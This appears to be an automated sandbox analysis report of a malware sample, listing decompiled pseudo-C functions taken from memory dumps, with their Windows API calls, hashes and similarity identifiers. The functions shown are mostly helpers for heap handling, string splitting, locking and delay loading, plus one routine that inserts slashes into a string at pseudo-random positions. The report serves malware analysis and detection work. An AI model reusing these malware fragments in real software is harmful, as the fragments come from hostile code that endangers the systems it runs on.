Instruction ID: c3c4b33fb4c682f6236b5cfb4def225ba87eee4c1ab4da00567f9ae93d0a8fdb
Opcode Fuzzy Hash: 44098a0b6e18129c68cf9c42d74f78039545188b71e90be0b5c30bd1ebc769ba
Instruction Fuzzy Hash: 6C11A776248601EE971155F98C89FFA22EF9BC267C7310724F634C66C4EE608843A9B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E744F, Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,6E1E7510,00000000,?,00000001,?,?,6E1E7643,00000001,6E192674,6E19266C,6E192674), ref: 6E1E74DF

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 092654cf6b22f4f21f39abd56b84ab6bebdaf679fe9f8e2afc23f6aa73aef634
Instruction ID: 54830b0a2e1dde041782f6f019a7d974abc263dd21f18594f08f3ff04cd30981
Opcode Fuzzy Hash: 092654cf6b22f4f21f39abd56b84ab6bebdaf679fe9f8e2afc23f6aa73aef634
Instruction Fuzzy Hash: EA115032A10F21ABFB528BE88C04B493BA4AF02770F250511FE14EB6C5D730ED80E6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00E852E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E852E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xe8a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xe8a2a8; // 0x7fdfed31
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xe8a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00e852ed
0x00e852f0
0x00e852f6
0x00e8530e
0x00e85312
0x00e85315
0x00e85317
0x00e8531a
0x00e8531c
0x00e8531f
0x00e85321
0x00e85321
0x00e85323
0x00e8532e
0x00e85333
0x00e85344
0x00e8534c
0x00e85351
0x00e85354
0x00e85357
0x00e85359
0x00e8535f
0x00e85362
0x00e85362
0x00e85362
0x00e8536d
0x00e85372
0x00e8537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E862E0,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E852F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00E85308
memcpy.NTDLL(00000000,05499630,-00000008,?,?,?,00E862E0,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E8534C
memcpy.NTDLL(00000001,05499630,00000001,00E870D9,00000000,05499630), ref: 00E8536D

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4a81e179a1dae2efd8d40a6432d684770b15ab5f7815bf547065888d5d936bc5
Instruction ID: eee508efb0a2ab1ff7ad3250fc8d991c8c50d0046a8a9659a21752254ea5f830
Opcode Fuzzy Hash: 4a81e179a1dae2efd8d40a6432d684770b15ab5f7815bf547065888d5d936bc5
Instruction Fuzzy Hash: 89112C72A00114BFD7109F6ADC84D5E7BFDDB80390B180176F40DE7160EA709D04C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E8578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00E8578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00E86837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xe892a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xe892a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00e85797
0x00e8579b
0x00e8579d
0x00e8579e
0x00e857a6
0x00e857a6
0x00e857aa
0x00000000
0x00000000
0x00e857a1
0x00e857a2
0x00e857a5
0x00e857a5
0x00e857b2
0x00e857b9
0x00e857bd
0x00e857c5
0x00e857cb
0x00e857cd
0x00e857d2
0x00e857d6
0x00e857d8
0x00e857db
0x00e857e2
0x00e857e2
0x00e857ec
0x00e857ef
0x00e857f2
0x00e857f2
0x00e857fe
0x00e857fe
0x00e8580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0549962C,?,?,?,00E81128,0549962C,?,?,00E855D3), ref: 00E857A6
StrTrimA.SHLWAPI(?,00E892A4,00000002,?,?,?,00E81128,0549962C,?,?,00E855D3), ref: 00E857C5
StrChrA.SHLWAPI(?,00000020,?,?,?,00E81128,0549962C,?,?,00E855D3,?,?,?,?,?,00E86BD8), ref: 00E857D0
StrTrimA.SHLWAPI(00000001,00E892A4,?,?,?,00E81128,0549962C,?,?,00E855D3,?,?,?,?,?,00E86BD8), ref: 00E857E2

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 488630de812720e32e07939f58287223618f59f05032934ae091386e64ad8ce1
Instruction ID: 7c80fe94bd600c9ffaeb19c8dc8097acedbc20ce04c0d3a9ccc542f1a2cafcf3
Opcode Fuzzy Hash: 488630de812720e32e07939f58287223618f59f05032934ae091386e64ad8ce1
Instruction Fuzzy Hash: 8E01F573641711AFD321AF158C09E2BBBD8EF86B94F15152AF94DE7250DB71CC0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E810DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E810DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xe8a37c; // 0x5499630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xe8a37c; // 0x5499630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xe8a030) {
					HeapFree( *0xe8a290, 0, _t8);
				}
				_t14[1] = E00E8578C(_v0, _t14);
				_t11 =  *0xe8a37c; // 0x5499630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00e810dd
0x00e810dd
0x00e810e6
0x00e810f6
0x00e810f6
0x00e810fb
0x00e81100
0x00000000
0x00000000
0x00e810f0
0x00e810f0
0x00e81102
0x00e81106
0x00e81118
0x00e81118
0x00e81128
0x00e8112b
0x00e81130
0x00e81134
0x00e8113a

APIs

RtlEnterCriticalSection.NTDLL(054995F0), ref: 00E810E6
Sleep.KERNEL32(0000000A,?,?,00E855D3,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E810F0
HeapFree.KERNEL32(00000000,00000000,?,?,00E855D3,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E81118
RtlLeaveCriticalSection.NTDLL(054995F0), ref: 00E81134

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 8142f9d155edc6387097ba282d620c9bbe360562d69b7314e9c4611a9fe19bcc
Instruction ID: e8ab123b83e6d44e27f936aa1164de63b6ed9b0ba72a573943ed67c0ed5de0b5
Opcode Fuzzy Hash: 8142f9d155edc6387097ba282d620c9bbe360562d69b7314e9c4611a9fe19bcc
Instruction Fuzzy Hash: FFF05E70601240DFE720AF6AEC49F2A77E8AB04700B089422F64DF7272C620DC48CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00E85076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E85076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xe8a2c4; // 0x2fc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xe8a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xe8a2c4; // 0x2fc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xe8a290; // 0x50a0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00e85076
0x00e8507d
0x00e850c7
0x00e850c9
0x00e850c9
0x00e85081
0x00e85087
0x00e8508c
0x00e85090
0x00e85096
0x00e8509d
0x00000000
0x00000000
0x00e8509f
0x00e850a4
0x00000000
0x00000000
0x00000000
0x00e850a4
0x00e850a6
0x00e850ae
0x00e850b1
0x00e850b1
0x00e850b7
0x00e850be
0x00e850c1
0x00e850c1
0x00000000

APIs

SetEvent.KERNEL32(000002FC,00000001,00E856C9), ref: 00E85081
SleepEx.KERNEL32(00000064,00000001), ref: 00E85090
CloseHandle.KERNEL32(000002FC), ref: 00E850B1
HeapDestroy.KERNEL32(050A0000), ref: 00E850C1

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 27fe25d2f9cb74d86806d220a4f6b9f0c6342b7edc901b8d55706388d5d93ab6
Instruction ID: 517b50609dc8f29fe3674e362f1be0f642b59ac624f8b22950ec568cfe036a16
Opcode Fuzzy Hash: 27fe25d2f9cb74d86806d220a4f6b9f0c6342b7edc901b8d55706388d5d93ab6
Instruction Fuzzy Hash: F5F01C32F017119FEA306B769C4CB6A37A8AB04B25B0C0525BC0DF71A2CF25DC088B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E213B2A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E2057FE,00000000,?,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001), ref: 6E213B41
GetLastError.KERNEL32(?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000,00000001,?,6E20E24F,6E2055A5), ref: 6E213B4D

Part of subcall function 6E213B13: CloseHandle.KERNEL32(6E21B940,6E213B5D,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000,00000001), ref: 6E213B23

___initconout.LIBCMT ref: 6E213B5D

Part of subcall function 6E213AD5: CreateFileW.KERNEL32(6E197E28,40000000,00000003,00000000,00000003,00000000,00000000,6E213B04,6E21299A,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000), ref: 6E213AE8

WriteConsoleW.KERNEL32(?,?,6E2057FE,00000000,?,6E2129AD,?,00000001,?,00000001,?,6E20DCEA,00000000,00000000,00000001,00000000), ref: 6E213B72

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2153114fc76cf1c1e26cd81f5509af08bce40c1cc1cb59c7c46521402f8b3cab
Instruction ID: 4a36cef5c7aa50f8cb5ce13b889e23cc369c783043499308e59e983d1515f7f8
Opcode Fuzzy Hash: 2153114fc76cf1c1e26cd81f5509af08bce40c1cc1cb59c7c46521402f8b3cab
Instruction Fuzzy Hash: 2EF01C36555619BBCF525FD1CC0CAC93FA7FF0A3A5B054410FB0996220EB328A20EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E850DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00E850DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xe8a37c; // 0x5499630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xe8a37c; // 0x5499630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xe8a37c; // 0x5499630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xe8b83e) {
					HeapFree( *0xe8a290, 0, _t10);
					_t7 =  *0xe8a37c; // 0x5499630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00e850df
0x00e850e8
0x00e850f8
0x00e850f8
0x00e850fd
0x00e85102
0x00000000
0x00000000
0x00e850f2
0x00e850f2
0x00e85104
0x00e85109
0x00e8510d
0x00e85120
0x00e85126
0x00e85126
0x00e8512f
0x00e85131
0x00e85135
0x00e8513b

APIs

RtlEnterCriticalSection.NTDLL(054995F0), ref: 00E850E8
Sleep.KERNEL32(0000000A,?,?,00E855D3,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E850F2
HeapFree.KERNEL32(00000000,?,?,?,00E855D3,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E85120
RtlLeaveCriticalSection.NTDLL(054995F0), ref: 00E85135

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: ff9d00856832b18e75cd5230d469b3ab50831b98f7a8ec39dc72968208a94bd9
Instruction ID: cc17207c2fc60f024ac1c0288f3b8ea6d02d8cd862119fcc094b257311130e56
Opcode Fuzzy Hash: ff9d00856832b18e75cd5230d469b3ab50831b98f7a8ec39dc72968208a94bd9
Instruction Fuzzy Hash: C1F0DA75600600DFE718EB26DC59F3A37A5AB48701B084425E91EB7371CB34AC08DB22

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FCAEA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1FCC55

Strings

+, xrefs: 6E1FCB90
-, xrefs: 6E1FCB83

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d0a833a9497096c524070f9ce53ebd43cba6b97d4a6d30f33d2b2c47f353da85
Instruction ID: 42835f8dd402c6ec557ef7125f2911de2dd6e8b70e79a6488cb858cb8f43b1f8
Opcode Fuzzy Hash: d0a833a9497096c524070f9ce53ebd43cba6b97d4a6d30f33d2b2c47f353da85
Instruction Fuzzy Hash: EA91F630D44249DEDB10CEE9C4606EDBBF5AF56360F24464AE874AF290D2308987BBD9

Uniqueness

Uniqueness Score: -1.00%

Function 6E203A55, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 6E20358B: GetOEMCP.KERNEL32(00000000,6E2037FD,6E20D971,00000000,00000000,00000000,00000000,?,6E20D971), ref: 6E2035B6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E203844,?,00000000,6E20D971,558B0000,?,?,?,?,00000000), ref: 6E203AB3
GetCPInfo.KERNEL32(00000000,D8 n,?,?,6E203844,?,00000000,6E20D971,558B0000,?,?,?,?,00000000,00000000), ref: 6E203AF5

Strings

D8 n, xrefs: 6E203AF0, 6E203AF3

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CodeInfoPageValid
String ID: D8 n
API String ID: 546120528-549768355
Opcode ID: 5c0b9f8d39b21a1f246da8c292ffb7e7b90111c8a0aa58923eb37e7c45db2505
Instruction ID: ec3b8f7f47f2f38aaeab5dc9e4aad3aecac5836c6682417675c66b7183be7cf5
Opcode Fuzzy Hash: 5c0b9f8d39b21a1f246da8c292ffb7e7b90111c8a0aa58923eb37e7c45db2505
Instruction Fuzzy Hash: AA512170A0464E9FD7118FA6C498EEABBFBFF41308F10446ED0928B291E7749146CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F2273, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E1F22B6, 6E1F22BD, 6E1F22F3

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 9ff4513d1de4845084a23672796317165a53e1b31c0d004f5b8dd152c9262bd0
Instruction ID: 34aa95cbe0caf5150ff6c6f60bd93d54b086d7fa865c0ad4554f7a098c4761b5
Opcode Fuzzy Hash: 9ff4513d1de4845084a23672796317165a53e1b31c0d004f5b8dd152c9262bd0
Instruction Fuzzy Hash: 984184B1E04659EFDB11DFD9C8849DEBBFDEB99710B200466E51497240EB708A82EFD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E82F68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E82F68(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 = _t56 + _t5;
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 =  *0xe8a11c(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t48 = RtlAllocateHeap( *0xe8a290, 0, _a16 + __eax);
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00E877A4(_t57 - _a4, _a4, _t48);
							_t38 = E00E877A4(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00E877A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x00e82f70
0x00e82f75
0x00e82f77
0x00e82f7e
0x00e82f90
0x00e82f90
0x00e82f94
0x00e82f96
0x00e82f99
0x00e82f9c
0x00e82fa5
0x00e82faf
0x00e82fb3
0x00e82fb8
0x00e82fce
0x00e82fd2
0x00e83021
0x00e82fd4
0x00e82fd4
0x00e82fdd
0x00e82fec
0x00e82ff1
0x00e82ffe
0x00e83007
0x00e83012
0x00e83019
0x00e8301d
0x00e8301d
0x00e82fd2
0x00e83028
0x00e8302f

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00E82F9C
RtlAllocateHeap.NTDLL(00000000,?), ref: 00E82FC8

Strings

x, xrefs: 00E82FA9

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrlen
String ID: x
API String ID: 556738718-2985756205
Opcode ID: 4eab208994da19181021d5be1ae549b62b3d6369fda0a0f9b4a303b1cb003e83
Instruction ID: a8fb7305c6fbc752a5e02ca727c71d0ef18c177b372e1ba1a419daf110fbd4d4
Opcode Fuzzy Hash: 4eab208994da19181021d5be1ae549b62b3d6369fda0a0f9b4a303b1cb003e83
Instruction Fuzzy Hash: CC217C35600149AFCF12DF69C884B9EBBB5EF85715F188155F84CAB315C731DA19CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F11AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6E1F1207
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F122D

Strings

$KL, xrefs: 6E1F1212

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID: $KL
API String ID: 1992179935-2900536411
Opcode ID: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
Instruction ID: ca2c88dba8b7d02bb0a48d10132aab5683aac70da26009302041a70753f856d3
Opcode Fuzzy Hash: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
Instruction Fuzzy Hash: C911E5B2A54308EFDB11DFE88C40BDEB6FDEB81758F214868D400B7141D374AE869A94

Uniqueness

Uniqueness Score: -1.00%

Function 00E81A15, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
registryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00E81A15(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _t11;
				void* _t15;

				_t11 =  *0xe8a0bc(_a4, _a12,  &_a12);
				_t15 = _t11;
				if(_t15 == 0) {
					_t15 =  *0xe8a0c4(_a12, _a16, _t11, _a8, _a20, _a24);
					RegCloseKey(_a12);
				}
				return _t15;
			}

0x00e81a23
0x00e81a29
0x00e81a2d
0x00e81a48
0x00e81a4a
0x00e81a4a
0x00e81a54

APIs

RegCloseKey.ADVAPI32(00E81E05,?,00E85F64,80000002,00000003,00E81E05,?,?,?,?,00E87792,3D00E890,00000000,80000002,00000000,000000F2), ref: 00E81A4A

Strings

.y, xrefs: 00E81A23
Sy, xrefs: 00E81A3F

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Close
String ID: .y$Sy
API String ID: 3535843008-2671831240
Opcode ID: fb702754cabdb63a47ad99833696795fae7f3ad451abf741ea922b0d8caa2db0
Instruction ID: e45e2fd036ac8980b9cfa0ca733680e0e4689faaeb91d4ea5785cc250ecc365c
Opcode Fuzzy Hash: fb702754cabdb63a47ad99833696795fae7f3ad451abf741ea922b0d8caa2db0
Instruction Fuzzy Hash: 76E0C93240021AAFDF125F91DC048DA3B6AFB08391B044461FE15A2120C732C935EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E878EB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E878EB() {

				E00E87A76(0xe892c4, 0xe8a11c);
				goto __eax;
			}

0x00e878ba
0x00e878c1

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E878BA

Part of subcall function 00E87A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E87AEF

Strings

x, xrefs: 00E878EB
x, xrefs: 00E878B4

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: x$x
API String ID: 123106877-269885486
Opcode ID: ed3c7437cbf2c02119570985ba7a5a870a055b748dcf3899ebd1024f9311d42f
Instruction ID: f5bf4875a8ecaba9f8629cd5e7a12a2463639fd828734755fe64c3bcea1b9d98
Opcode Fuzzy Hash: ed3c7437cbf2c02119570985ba7a5a870a055b748dcf3899ebd1024f9311d42f
Instruction Fuzzy Hash: 1AB012C165D1017C321CB3042C0BD3B014CC1C2B10334F02BF48CF0191E4408C840332

Uniqueness

Uniqueness Score: -1.00%

Function 00E87967, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E87967() {

				E00E87A76(0xe89304, 0xe8a0cc);
				goto __eax;
			}

0x00e87940
0x00e87947

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E87940

Part of subcall function 00E87A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E87AEF

Strings

Sy, xrefs: 00E8793A
gy, xrefs: 00E87967

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: Sy$gy
API String ID: 123106877-4267174266
Opcode ID: 140eb524a5a9c18f00ef545694343078ed3b4067a8283af730dd87fcc5be204e
Instruction ID: e673c588fddc7867b725c36fc2e8d92645ab34acbc946bff9651f6a245ba5deb
Opcode Fuzzy Hash: 140eb524a5a9c18f00ef545694343078ed3b4067a8283af730dd87fcc5be204e
